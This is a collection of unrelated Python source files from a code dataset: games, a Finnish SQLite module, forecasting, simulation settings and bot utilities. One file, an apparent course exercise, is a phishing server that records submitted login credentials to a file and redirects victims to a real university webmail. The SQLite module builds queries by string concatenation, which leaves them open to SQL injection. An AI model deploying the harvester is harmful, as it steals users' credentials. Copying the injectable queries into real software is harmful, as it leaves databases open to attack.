2)]\n choice = \"Scissors\"\n if (choice == 'Scissors'):\n if (computer_choice == 'Scissors'):\n print(\"**It's a tie**\")\n result=-1\n elif (computer_choice == 'Paper'):\n print(\"**You won**\")\n result =1\n # your_score += 1\n else:\n print((\"**You lose**\"))\n result=0\n # computer_score += 1\n\n callback(choice,computer_choice,result)\n #return your_score, computer_score\n\ndef callback(choice,computer_choice,result):\n your_score = 0\n computer_score = 0\n if(result ==-1):\n pass\n elif(result==1):\n your_score+=1\n else:\n computer_score+=1\n answer = \"Your's Choice ={}\\nComputer's choice={}\\nYour Score={}\\nComputer's score={}\".format(choice,\n computer_choice,\n your_score,\n computer_score)\n messagebox.showinfo(\"Score Board\",answer)\n\n # logic()\n\"\"\" text_area = tk.Text(master=window, height=12, width=30)\n #text_area.grid(column=0, row=4)\n answer = \"Your's Choice ={}\\nComputer's choice={}\\nYour Score={}\\nComputer's score={}\".format(choice,\n computer_choice,\n your_score,\n computer_score)\n text_area.insert(tk.END, answer)\n text_area.pack()\n \"\"\"\n\n\n\ndef logic():\n root.withdraw()\n window =tk.Toplevel()\n #photo = tk.PhotoImage(file =r\"C:\\Users\\vritti\\Pictures\\Python pictures\\StoneImage(1).png\")\n btn1 = tk.Button(master = window,text =\"STONE\", command =stone,font = (\"Times\",15,\"bold\"),bg = \"darkslategray3\",relief =\"ridge\")\n btn1.place(x=130,y=0)\n # btn1.pack()\n btn2 = tk.Button(master = window,text=\"PAPER\", command=paper, font=(\"Times\", 15, \"bold\"),bg =\"thistle\",relief =\"ridge\")\n btn2.place(x=230, y=0)\n #btn2.pack()\n btn3 = tk.Button(master =window,text = \"SCISSORS\", command=scissors, font=(\"Times\", 15, \"bold\"),bg =\"wheat3\",relief =\"ridge\")\n btn3.place(x=325, y=0)\n #btn3.pack()\n btn4 = tk.Button(master = window, text=\"Quit\", command = window.destroy , font=(\"Arial\", 15, \"italic\"))\n btn4.place(x=250,y=250)\n canvas1 = tk.Canvas(window, width = 1000, height = 190)\n canvas1.place(x=170,y=50)\n img1 = tk.PhotoImage(file=r\"stonepaperscissor1.png\")\n canvas1.create_image(0,0,anchor =\"nw\",image=img1)\n\n\n\n window.geometry(\"600x300+320+220\")\n window.mainloop()\n\n\nglobal choices\nchoices = [\"Stone\", \"Paper\", \"Scissors\"]\nroot = tk.Tk()\ntitle = root.title(\"STONE-PAPER-SCISSORS\")\nw_label1 = tk.Label(root,text = \"STONE PAPER SCISSORS\\n GAME\", font = (\"Fixedsys\", 30, \"bold\"), fg=\"SystemWindowFrame\",bg =\"floralwhite\")\nw_label1.pack(fill=\"both\")\nw_label2 = tk.Label(root,text = \"Developed By\\n #YoVri\", font = (\"Helvetica\", 15, \"italic\"),fg = \"SystemWindowText\",bg = \"rosybrown1\")\nw_label2.pack(fill =\"both\")\nw_button = tk.Button(root, text=\"Start\", command = logic , font = (\"Arial\",22,\"bold\"), fg = \"SystemButtonShadow\",bg =\"palevioletred\",relief =\"sunken\")\nw_button.place(x=250,y=180)\nroot.geometry(\"600x300+320+220\")\nroot.mainloop()\n","sub_path":"SPSGame.py","file_name":"SPSGame.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258178817","text":"# Tietokantamoduli\n\n# Modulien ja kirjastojen lataukset\nimport sqlite3\nfrom sqlite3.dbapi2 import SQLITE_INSERT\n\n# Luodaan uusi tietokanta projektin hakemistoon\ntietokannan_nimi = 'painonhallinta.db'\n\ndef luo_tietokanta(tiedosto):\n \"\"\"Luo tietokannan huom. tiedoston tyyppi po. .db\n\n Args:\n tiedosto (string): SQL Lite tietokantatiedoston nimi\n \"\"\"\n yhteys = sqlite3.connect(tiedosto)\n yhteys.close()\n\ndef luo_taulut(tiedosto):\n \"\"\"Luo SQL Lite tietokantaan tarvittavat taulut\n \"\"\"\n # Muodostetaan yhteys tietokantaan, luodaan kanta tarvittaessa\n yhteys = sqlite3.connect(tiedosto)\n\n # Luodaan Henkilö-taulu\n yhteys.execute('''CREATE TABLE henkilo\n (henkilo_id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n etunimi TEXT NOT NULL,\n sukunimi TEXT NOT NULL,\n sukupuoli INTEGER NOT NULL,\n spaiva DATE NOT NULL);''')\n\n # Luodaan Mittaukset-taulu, mittaus_id on laskuri\n yhteys.execute('''CREATE TABLE mittaus \n (mittaus_id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n henkilo_id INTEGER NOT NULL,\n pituus REAL NOT NULL,\n paino REAL NOT NULL,\n FOREIGN KEY (henkilo_id)\n REFERENCES henkilo (henkilo_id)\n ON DELETE CASCADE);''')\n \n \n # Suljetaan tietokantayhteys taulujen luonnin jälkeen\n yhteys.close()\n\n# Henkilötietojen lisääminen Henkilö-tauluun\ndef lisaa_henkilo(tiedosto, etunimi, sukunimi, sukupuoli, spaiva):\n \"\"\"Lisätään argumenttina annetun tietokannan henkilo-tauluun uusi tietue\n\n Args:\n tiedosto (string): tietokantatiedoston nimi\n etunimi (string): Henkilön etunimi\n sukunimi (string): Henkilön sukunimi\n sukupuoli (int): Sukupuolikoodi 1: mies 0: nainen\n spaiva (string): ISO-standardin mukainen päiväys YYYY-MM-DD\n \"\"\"\n # Rakennetaan SQL-lause argumenttien arvoista\n sql_lause = \"INSERT INTO henkilo (etunimi, sukunimi, sukupuoli, spaiva) VALUES (\" + \"'\" + etunimi + \"', \" + \"'\" + sukunimi + \"', \" + str(sukupuoli) + \", \" + \"'\" + spaiva + \"');\"\n\n # Luodaan yhteys tietokantaan\n yhteys = sqlite3.connect(tiedosto)\n\n # Suoritetaan tietueen lisäys SQL-lauseena\n yhteys.execute(sql_lause)\n\n # Vahvistetaan tapahtuma (transaktio) -tarvitaan INSERT-, UPDATE- ja DELETE-komentoja käytettäessä\n yhteys.commit()\n\n # Suljetaan yheys\n yhteys.close()\n\n# Funktio, jolla saadaan puolilainausmerkit merkkijonon ympärille\ndef sql_string(kentta):\n kentta = \"'\" + kentta +\"'\"\n return kentta\n\n# Rutiini mittaustietojen syöttämiseksi mittaukset tauluun, huom. mittaus_id laskuri\ndef lisaa_mittaus(tiedosto, henkilo_id, pituus, paino):\n \"\"\"Lisää henkilön mittaustiedot mittaus-tauluuun\n\n Args:\n henkilo_id (integer): henkiön id\n pituus (float): henkilön pituus sentteinä\n paino (float): henkilön paino kiloina\n \"\"\"\n sql_lause = \"INSERT INTO mittaus (henkilo_id, pituus, paino) VALUES (\" + str(henkilo_id) + \",\" + str(pituus) + \",\" + str(paino) + \");\"\n\n # Luodaan yhteys tietokantaan\n yhteys = sqlite3.connect(tiedosto)\n\n # Suoritetaan tietueen lisäys SQL-lauseena\n yhteys.execute(sql_lause)\n\n # Vahvistetaan tapahtuma (transaktio)\n yhteys.commit()\n\n # Suljetaan yheys\n yhteys.close()\n\n# Rutiini kaikkien tietojen lukemiseksi taulusta tai näkymästä\ndef lue_kaikki(tiedosto, taulu):\n \"\"\"[summary]\n\n Args:\n tiedosto (string): tietokantatiedoston nimi\n taulu (string): taulun nimi\n\n Returns:\n list: tulosjoukon tietueet\n \"\"\"\n lista = []\n sql_lause = \"SELECT * FROM \" + taulu + \";\"\n\n # Luodaan yhteys tietokantaan\n yhteys = sqlite3.connect(tiedosto)\n\n # Suoritetaan tietueen lisäys listaan SQL-lauseena\n tulosjoukko = yhteys.execute(sql_lause)\n for rivi in tulosjoukko:\n lista.append(rivi)\n \n # Suljetaan yhteys\n yhteys.close()\n \n # Palautetaan tulosjoukko \n return lista \n\n# Haetaan henkilön id:n perusteella hänen viimeisimmät tietonsa\ndef lue_viimeiset_tiedot(tiedosto, henkilo_id):\n \"\"\"Luetaan henkilön tiedot näkymästä henkilon_viimeiset_tiedot\n käyttämällä ehtonan henkilo_id-mumeroa\n\n Args:\n tiedosto (string): tietokantatiedoston nimi\n taulu (string): taulun nimi\n henkilo_id (integer): henkilön id \n\n Returns:\n list: tulosjoukon tietueet\n \"\"\"\n lista = []\n sql_lause = \"SELECT * FROM henkilon_viimeiset_tiedot WHERE henkilo_id = \" + str(henkilo_id) + \";\"\n\n # Luodaan yhteys tietokantaan\n yhteys = sqlite3.connect(tiedosto)\n\n # Suoritetaan tietueen lisäys listaan SQL-lauseena\n tulosjoukko = yhteys.execute(sql_lause)\n for rivi in tulosjoukko:\n lista.append(rivi)\n \n # Suljetaan yhteys\n yhteys.close()\n \n # Palautetaan tulosjoukko\n return lista \n# Paikallinen testaus\nif __name__ == \"__main__\":\n # luo_tietokanta(tietokannan_nimi)\n # luo_taulut(tietokannan_nimi)\n\n '''\n etunimi = 'Mikko'\n sukunimi = 'Viljanen'\n sukupuoli = 1\n spaiva = '1968-12-03'\n sql_lause = \"INSERT INTO henkilo (etunimi, sukunimi, sukupuoli, spaiva) VALUES (\" + \"'\" + etunimi + \"', \" + \"'\" + sukunimi + \"', \" + str(sukupuoli) + \", \" + \"'\" + spaiva + \"');\"\n print(sql_lause) '''\n\n # lisaa_henkilo(tietokannan_nimi, 'Mikko', 'Viljanen', 1, '1968-12-03')\n # lisaa_henkilo(tietokannan_nimi, 'Mika', 'Vainio', 1, '1962-06-26')\n\n '''\n henkilo_id = 1\n pituus = 171\n paino = 74\n sql_lause = \"INSERT INTO mittaus (henkilo_id, pituus, paino) VALUES (\" + str(henkilo_id) + \",\" + str(pituus) + \",\" + str(paino) + \");\"\n print(sql_lause) '''\n\n # lisaa_mittaus(tietokannan_nimi, 2, 171, 74)\n\n # tulosjoukko = lue_kaikki(tietokannan_nimi, 'henkilo')\n # print(tulosjoukko)\n # Testataan henkilön lisäystä\n lisaa_henkilo(tietokannan_nimi, 'Uolevi','Usvakumpu', 1, '1985-10-30')\n # Testatan näkymän henkilon_viimeiset_tiedot toimintaa\n henkilon_tiedot = lue_viimeiset_tiedot(tietokannan_nimi, 2)\n print(henkilon_tiedot)\n","sub_path":"kanta.py","file_name":"kanta.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"50501267","text":"import json\nfrom pprint import pprint\nimport sched, time\nimport random\n\n\ndef update_json(data):\n with open('data.json', 'w') as outfile:\n json.dump(data, outfile)\n\n\n# s = sched.scheduler(time.time, time.sleep)\n# def do_something(sc):\n# print(\"Doing stuff...\")\n# # do your stuff\n#\n# with open('data.json') as f:\n# data = json.load(f)\n#\n# data[\"rpm\"] = random.randint(0, 7000)\n# data[\"speed\"] = random.randint(0, 100)\n#\n# update_json(data)\n#\n#\n# s.enter(1.5, 1, do_something, (sc,))\n#\n# s.enter(1.5, 1, do_something, (s,))\n# s.run()\n\n\n# while True:\n\t\n\n# \twith open('data.json') as f:\n# \t data = json.load(f)\n\n# \tdata[\"speed\"] = random.randint(0,110)\n# \tdata[\"rpm\"] = random.randint(0, 7000)\n# \tdata[\"direction_degrees\"] = random.randint(0, 360)\n\n# \ttime.sleep(1)\n\n# \tupdate_json(data)\n\nfor i in range(1,110):\n\twith open('data.json') as f:\n\t\tdata = json.load(f)\n\n\tdata[\"speed\"] = i * 1\n\tdata[\"rpm\"] = i * 50\n\t\n\n\ttime.sleep(1)\n\n\tupdate_json(data)\n\n\n\n# print(data)\n# data[\"rpm\"] = 2343\n#\n# update_json(data)\n#\n# print(data)\n\n\n\n\n","sub_path":"fieldmonitor.py","file_name":"fieldmonitor.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425043761","text":"import urllib2\nimport json\n\ndef search(bot, args):\n\tif len(args) >= 2:\n\t\ttitle = \"\"\n\t\t\n\t\tif args[1].startswith(\"cr=\"):\n\t\t\texpr = __import__('re').search('cr=([a-zA-Z]{2})$', args[1])\n\t\t\tif expr:\n\t\t\t\tcountry = expr.group(1).upper()\n\t\t\t\tif country == \"CN\":\n\t\t\t\t\treturn \"google.cn? hah.\"\n\t\t\telse:\n\t\t\t\treturn \"Invalid country code.\"\n\t\t\tterms = ' '.join(args[2:])\n\t\telse:\n\t\t\tcountry = \"\"\n\t\t\tterms = ' '.join(args[1:])\n\t\tresult = urllib2.urlopen(\"http://ajax.googleapis.com/ajax/services/search/web?v=1.0&safe=off&q=%s&gl=%s\" % (urllib2.quote(terms), country), timeout = 5)\n\t\tjsondata = json.load(result)\n\t\ttry:\n\t\t\turl = jsondata['responseData']['results'][0]['unescapedUrl'].encode('utf-8')\n\t\t\tif url.startswith(\"http://www.youtube.com/\") or url.startswith(\"https://www.youtube.com/\"):\n\t\t\t\timport scanner\n\t\t\t\ttitle = \"\\n\" + scanner.scan(bot, url)\n\t\t\tif country:\n\t\t\t\treturn \"From %s only: %s%s\" % (country, url, title)\n\t\t\telse:\n\t\t\t\treturn \"%s%s\" % (url, title)\n\t\texcept IndexError:\n\t\t\treturn \"Your search did not return any results.\"\n\telse:\n\t\treturn \"Usage: !%s [cr=<2-letter country code>] \" % args[0]\n","sub_path":"xbot/modules/googleapi.py","file_name":"googleapi.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524017840","text":"import http.server\nimport ssl\nimport os\nimport webbrowser\n\nkeypath = os.path.abspath('privkeyC.pem')\ncertpath = os.path.abspath('certC.crt')\n\nclass MyHandler(http.server.SimpleHTTPRequestHandler):\n def do_POST(self):\n self.send_response(302)\n varLen = int(self.headers['Content-Length'])\n self.server.postVars = self.rfile.read(varLen)\n print(self.server.postVars)\n file = open(\"login.txt\", \"a\")\n file.write(self.server.postVars.decode().replace('&', '\\n'))\n file.close()\n self.send_header('Location', \"https://smail.pwr.edu.pl/auth?fromlogin=true&orgaccess=http&username=rrrr&password=t5t\")\n self.end_headers()\n#\twebbrowser.open(\"https://smail.pwr.edu.pl/\", new = 1)\n\n\nport = 3050\n\nhttpd = http.server.HTTPServer(('localhost', port), MyHandler)\nhttpd.socket = ssl.wrap_socket(httpd.socket, keyfile=keypath, certfile=certpath, server_side=True)\nprint(\"serving at port\", port)\nhttpd.serve_forever()\n\n# python server.py\n# https://localhost:3050/\n","sub_path":"Lista 3/zad3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598885683","text":"N = int(input())\nps = [int(x) for x in input().split()]\n\nfor i in range(N):\n min_n = ps[i]\n index = i\n for j in range(i+1, N):\n if ps[j] < min_n:\n min_n = ps[j]\n index = j\n\n if index != i:\n tmp = ps[i]\n ps[i] = ps[index]\n ps[index] = tmp\n break\n \nsorted_ps = sorted(ps)\nif ps == sorted_ps:\n print('YES')\nelse:\n print('NO')\n ","sub_path":"AtCoder/beginner/135/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"196866407","text":"import sys\nn = int(input())\nmatrix = [ list(map(int,input().split())) for _ in range(n) ]\ndp = [ [0]*(n) for _ in range(n) ]\n\n#주 대각선을 제외한 대각선\nfor diagonal in range(1,n):\n #대각선이 점점 짧아짐\n for i in range(n - diagonal):\n #현재 대각선에서 몇 번째 원소인지를 정하는 것\n j = i + diagonal\n dp[i][j] = sys.maxsize\n for k in range(i,j):\n dp[i][j] = min(dp[i][j], dp[i][k]+dp[k+1][j]+matrix[i][0]*matrix[k][1]*matrix[j][1])\n\n\nprint(dp[0][-1])","sub_path":"3.beakjoon/jungle/week4/11049_행렬 곱셈 순서.py","file_name":"11049_행렬 곱셈 순서.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373080252","text":"import secrets\n\n\ndef _get_header(token):\n return f'''\nrule encoding_tpc_{token}:'''\n\n\ndef _get_benchmark(benchmark_out):\n return f'''\n benchmark:\n \"{benchmark_out}\"'''\n\n\ndef _get_main(fasta_in, classes_in, tpc_out):\n return f'''\n input:\n fasta_in=\"{fasta_in}\",\n classes_in=\"{classes_in}\"\n output:\n csv_out=\"{tpc_out}\"\n threads:\n 1000\n params:\n snakefile=\"nodes/encodings/tpc/Snakefile\",\n configfile=\"nodes/encodings/tpc/config.yaml\"\n run:\n with WorkflowExecuter(dict(input), dict(output), params.configfile, cores=CORES) as e:\n shell(f\"\"\"{{e.snakemake}} -s {{params.snakefile}} --configfile {{params.configfile}}\"\"\")\n'''\n\n\ndef rule(fasta_in, classes_in, tpc_out, benchmark_dir=None):\n \"\"\"\n Computes the Tri-Peptide Composition (TPC) encoding.\n\n Category: encodings \\n\n Node: tpc\n\n :param fasta_in: The path to the fasta file.\n :param classes_in: The path to the classes file.\n :param tpc_out: The output file path to store the encoded dataset.\n :param benchmark_dir: The path to the directory to store the benchmark results. If None,\n benchmark will be not executed (default).\n\n :return: A string object representing a Snakemake rule.\n \"\"\"\n token = secrets.token_hex(4)\n rule = _get_header(token)\n if benchmark_dir is not None:\n benchmark_out = f\"{benchmark_dir}encoding_tpc_{token}.txt\"\n rule += _get_benchmark(benchmark_out)\n rule += _get_main(fasta_in, classes_in, tpc_out)\n return rule\n","sub_path":"nodes/encodings/tpc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"70823297","text":"import pygame\n\nwidth=eval(input(\"Width: \\n\"))\nheight=eval(input(\"Height: \"))\n\nsurface=pygame.display.set_mode((width,height))\n\nclass Grid():\n\tdef __init__(self):\n\t\tself.grid=[]\n\t\tself.x=0\n\t\tself.y=0\n\tdef forme(self,p):\n\t\tif p==0:\n\t\t\tpygame.draw.rect(surface,(0,0,0),(self.x+10,self.y+10,10,10),0)\n\t\tif p==1:\n\t\t\tpygame.draw.rect(surface,(0,255,0),(self.x+10,self.y+10,10,10),0)\n\tdef move(self,d):\n\t\tself.forme(0)\n\t\tif d==0:\n\t\t\tself.x=self.x+30\n\t\tif d==1:\n\t\t\tself.y=self.y+30\n\t\tif d==2:\n\t\t\tself.x=self.x-30\n\t\tif d==3:\n\t\t\tself.y=self.y-30\n\t\tself.forme(1)\n\n\tdef remove(self):\n\t\tfor i in range(0,len(self.grid)-1):\n\t\t\tif self.x==self.grid[i][0]:\n\t\t\t\tdel self.grid[i]\n\t\t\t\tpygame.draw.rect(surface,(0,0,0),(self.x,self.y,30,30),0)\n\t\t\t\tprint(1)\n\n\tdef gridm(self):\n\n\t\tself.grid.append([self.x,self.y])\n\t\tpygame.draw.rect(surface,(255,255,255),(self.x,self.y,30,30),0)\n\n\tdef end(self):\n\t\tfile=open(\"grid.py\",\"w\")\n\t\tfile.write(repr(self.grid))\na=0\nb=0\nwhile a 0:\n return x.iloc[-1]\n else:\n return 0\n preds = X.apply(mostrecent, axis=1)\n\n return preds\n\ndef arima(X, order = (1,1,1), lookback = 5):\n \"\"\"Predict the most recent value using an ARIMA model.\n\n By default, will fit ARIMA(1,1,1) for each row by using\n\n the 5 most recent years of the time series.\n\n If any issues fitting time series model, use status_quo.\"\"\"\n \n sq_preds = status_quo_model(X)\n forecasts = list()\n # lots of warnings about convergence. can ignore for now.\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\")\n for index, row in X.iterrows():\n # fill in gaps\n row_interp = row.interpolate(\n method = 'linear', limit = 50,\n limit_direction = 'backward')\n # Fit ARIMA model on `lookback` most recent years data.\n # Since so much missing data exists, it is not\n # clear that including more years of interpolated\n # data is helping in terms of RMSE\n model = sm.tsa.arima_model.ARIMA(row_interp.tolist()[-lookback:], order=order)\n try:\n results = model.fit(disp = 0)\n if pd.isnull(results.forecast()[0][0]) or np.abs(results.forecast()[0][0])>2:\n forecasts.append(sq_preds.loc[index])\n else: \n forecasts.append(results.forecast()[0][0])\n except (ValueError, np.linalg.linalg.LinAlgError, MissingDataError) as e:\n forecasts.append(sq_preds.loc[index])\n return(forecasts)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"218126109","text":"import pandas as pd\nimport requests\nimport time\nimport sys \n\nurl = 'http://localhost:3000/health'\n\ndataset=pd.read_csv(r'C:\\Users\\niceb\\Desktop\\final.csv')\ndataset=dataset.fillna(0)\n\nx=dataset.iloc[:,[0,1,2,3,4,5,6,7,8,9,10,11]].values\ny=dataset.iloc[:,[12,13,14,15,16]].values\n\nfrom sklearn.model_selection import train_test_split\nxtrain,xtest,ytrain,ytest=train_test_split(x,y,test_size=0.20,random_state=3)\n\nfrom sklearn.neighbors import KNeighborsClassifier\nmodel=KNeighborsClassifier(n_neighbors=10)\nmodel.fit(xtrain,ytrain)\n\nypred=model.predict(xtest)\n\nfrom sklearn.metrics import accuracy_score\n\nrow=0\ncnt=1\ndata=[[sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5],sys.argv[6],sys.argv[7],sys.argv[8],sys.argv[9],sys.argv[10],sys.argv[11],sys.argv[12]]]\n\na = model.predict(data)\nprint(a[0])\nb = data['Unnamed: 0'][row:row+1]\nmyobj = {'somekey': a,'uname':b,'inputdata':c}\nrow+=1\ntime.sleep(0.5)\nxyz = requests.post(url, data = myobj)\n \n\n\n\n\n","sub_path":"tcs/routes/trailcode.py","file_name":"trailcode.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293485040","text":"\n##################################################################################################################\n\"\"\"\nContain settings used for running trade simulations\n\"\"\"\n\n__version__ = '1.1.1'\n__author__ = 'Victor Guillet'\n__date__ = '10/09/2019'\n\n##################################################################################################################\n\n\nclass Trade_sim_settings:\n # ___________________________ Simulation parameters ______________________\n simulation_name = \"1\"\n nb_data_slices = 5\n\n # ___________________________ Print/plot parameters ______________________\n plot_eco_model_results = False\n print_trade_process = False\n\n # ___________________________ Investment settings ________________________\n investment_settings = 3\n cash_in_settings = 2\n\n initial_investment = 1000\n\n # Max --> Min\n max_investment_per_trade_percent = 0.30\n min_investment_per_trade_percent = 0.05\n\n investment_per_trade_decay_function = 1\n\n # =============================== SINGLE TRADE SIM SETTINGS ===================\n def gen_single_trade_sim(self):\n\n # ___________________________ Metalabels parameters ______________________\n self.run_metalabels = True # Can be switched off for performance increase\n\n self.m_investment_settings = 1\n self.m_cash_in_settings = 0\n\n # ___________________________ Stop-loss settings ________________________\n # Max --> Min\n self.max_prev_stop_loss = 0.85\n self.min_prev_stop_loss = 0.98\n\n self.prev_stop_loss_decay_function = 1\n\n # Max --> Min\n self.max_max_stop_loss = 0.75\n self.min_max_stop_loss = 0.95\n\n self.max_stop_loss_decay_function = 1\n\n # =============================== MULTI TRADE SIM SETTINGS ====================\n def gen_multi_trade_sim(self):\n # ___________________________ Stop-loss settings ________________________\n # Account\n # Max --> Min\n self.max_account_prev_stop_loss = 0.90\n self.min_account_prev_stop_loss = 0.95\n\n self.account_prev_stop_loss_decay_function = 1\n\n # Max --> Min\n self.max_account_max_stop_loss = 0.85\n self.min_account_max_stop_loss = 0.95\n\n self.account_max_stop_loss_decay_function = 1\n\n # Ticker\n # Max --> Min\n self.max_ticker_prev_stop_loss = 0.85\n self.min_ticker_prev_stop_loss = 0.95\n\n self.ticker_prev_stop_loss_decay_function = 1\n\n # Max --> Min\n self.max_ticker_max_stop_loss = 0.85\n self.min_ticker_max_stop_loss = 0.95\n\n self.ticker_max_stop_loss_decay_function = 1\n","sub_path":"PhyTrade/Settings/Trade_sim_settings.py","file_name":"Trade_sim_settings.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"462382864","text":"# coding: utf-8\n#! /usr/bin/env python3\n\n\"\"\"Implementation of the manager of the \"categories\" table\n\"\"\"\n\n# Local application imports\nfrom database.models.category_model import CategoryModel\n\nclass CategoriesManager:\n \"\"\"Manager of the \"categories\" table\n This table contains information about the categories\n \"\"\"\n def __init__(self, database_manager):\n \"\"\"Initialization of the manager instance of the \"categories\" table\n\n Args:\n database_manager (DatabaseManager): Instance of the database manager\n \"\"\"\n self.database_manager = database_manager\n\n def manage(self, *categories):\n \"\"\"Method called from the database manager\n We add the categories to the database if they are not already there\n \"\"\"\n for category in categories:\n if not self.get_id(category):\n self.add_to_table(category)\n\n def get_id(self, category):\n \"\"\"Retrieving the ID of a category from its name\n\n Args:\n category (CategoryModel): CategoryModel instance\n\n Returns:\n Int: Category ID in the database\n \"\"\"\n cursor = self.database_manager.mydb.cursor(buffered=True)\n query = (\"\"\"\n SELECT category_id\n FROM categories\n WHERE category_name = %s\n \"\"\")\n if category:\n data = (category.category_name,)\n cursor.execute(query, data)\n result = cursor.fetchone()\n cursor.close()\n if result is not None:\n return result[0]\n return None\n\n def add_to_table(self, category):\n \"\"\"Injection of a category into the \"categories\" table\n\n Args:\n category (CategoryModel): CategoryModel instance\n \"\"\"\n cursor = self.database_manager.mydb.cursor(buffered=True)\n statement = (\n \"INSERT INTO categories\"\n \"(category_name)\"\n \"VALUES (%s)\"\n )\n data = (category.category_name,)\n cursor.execute(statement, data)\n cursor.close()\n\n def create_categories(self, *categories_infos):\n \"\"\"Creates instances of the CategoryModel object\n\n Args:\n categories_infos (List): Categories informations\n\n Returns:\n List: CategoryModel instances\n \"\"\"\n categories = list()\n for category_infos in categories_infos:\n category = self.create(category_infos)\n categories.append(category)\n return categories\n\n def create(self, category_infos):\n \"\"\"Creates an instance of the CtaegoryModel object\n Adaptation according to the amount of information available\n\n Args:\n category_infos (List): Category information in the database\n\n Returns:\n CategoryModel: CategoryModel instance\n \"\"\"\n # If we know the name and the ID of the category\n if len(category_infos) == 2:\n category = CategoryModel(category_name=category_infos[1],\n category_id=category_infos[0])\n\n # If we only know the name of the category\n elif len(category_infos) == 1:\n category = CategoryModel(category_name=category_infos[0])\n category.category_id = self.get_id(category)\n else:\n category = CategoryModel(category_name=category_infos)\n category.category_id = self.get_id(category)\n return category\n","sub_path":"database/managers/categories_manager.py","file_name":"categories_manager.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"7970120","text":"#!/usr/bin/env python\nimport copy\nfrom datetime import timedelta\n\nimport numpy\nnp = numpy\nfrom colander import (SchemaNode, drop, Bool)\n\nfrom gnome.persist.validators import convertible_to_seconds\nfrom gnome.persist.base_schema import ObjType\nfrom gnome.persist.extend_colander import LocalDateTime\n\nfrom gnome.array_types import mass_components, half_lives\nfrom gnome.utilities.serializable import Serializable\n\nfrom gnome.movers.movers import Mover\n\n\nclass WeathererSchema(ObjType):\n on = SchemaNode(Bool(), default=True, missing=True)\n active_start = SchemaNode(LocalDateTime(), missing=drop,\n validator=convertible_to_seconds)\n active_stop = SchemaNode(LocalDateTime(), missing=drop,\n validator=convertible_to_seconds)\n\n\nclass Weatherer(Mover, Serializable):\n '''\n Base Weathering agent. This is almost exactly like the base Mover\n in the way that it acts upon the model. It contains the same API\n as the mover as well.\n '''\n _state = copy.deepcopy(Mover._state)\n _schema = WeathererSchema\n\n def __init__(self, **kwargs):\n '''\n :param weathering: object that represents the weathering\n properties of the substance that our\n LEs are made up of.\n '''\n super(Weatherer, self).__init__(**kwargs)\n self.array_types.update({'mass_components': mass_components,\n 'half_lives': half_lives})\n\n def __repr__(self):\n return ('{0.__class__.__module__}.{0.__class__.__name__}('\n 'active_start={0.active_start!r}, '\n 'active_stop={0.active_stop!r}, '\n 'on={0.on}, '\n 'active={0.active}'\n ')'.format(self))\n\n def weather_elements(self, sc, time_step, model_time):\n '''\n Here we run get_move, and then apply the results to the elements\n in our spill container. It just seems more intuitive that the\n weatherer control what happens to the elements instead of the model,\n as happens with the movers.\n '''\n hl = self.get_move(sc, time_step, model_time)\n sc['mass_components'][:] = hl\n sc['mass'][:] = hl.sum(1)\n\n def get_move(self, sc, time_step, model_time):\n m0, f, time = self._xform_inputs(sc, time_step, model_time)\n return self._halflife(m0, f, time)\n\n def _xform_inputs(self, sc, time_step, model_time):\n 'make sure our inputs are a good fit for our calculations'\n if 'mass_components' not in sc:\n raise ValueError('No mass attribute available to calculate '\n 'weathering')\n\n if 'half_lives' not in sc:\n raise ValueError('No half-lives attribute available to calculate '\n 'weathering')\n\n time_step = self._get_active_time(time_step, model_time)\n return sc['mass_components'], sc['half_lives'], time_step\n\n def _get_active_time(self, time_step, model_time):\n 'calculate the weathering time duration in seconds'\n if hasattr(time_step, 'total_seconds'):\n time_step = time_step.total_seconds()\n model_end_time = model_time + timedelta(seconds=time_step)\n\n if self.active_stop < model_end_time:\n model_end_time = self.active_stop\n if self.active_start > model_time:\n model_time = self.active_start\n\n if model_end_time > model_time:\n return (model_end_time - model_time).total_seconds()\n else:\n return 0\n\n def _halflife(self, M_0, factors, time):\n 'Assumes our factors are half-life values'\n half = np.float64(0.5)\n total_mass = M_0 * (half ** (time / factors))\n\n return total_mass\n","sub_path":"py_gnome/gnome/weatherers/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"566142716","text":"import logging\nimport os\nimport random\nfrom collections import OrderedDict\nfrom typing import Tuple, List, Dict\n\nimport cv2\nimport numpy as np\nimport pandas as pd\n\nfrom cxflow.datasets import BaseDataset\nfrom fuel.datasets import IndexableDataset\nfrom fuel.schemes import SequentialScheme, ShuffledScheme\nfrom fuel.streams import 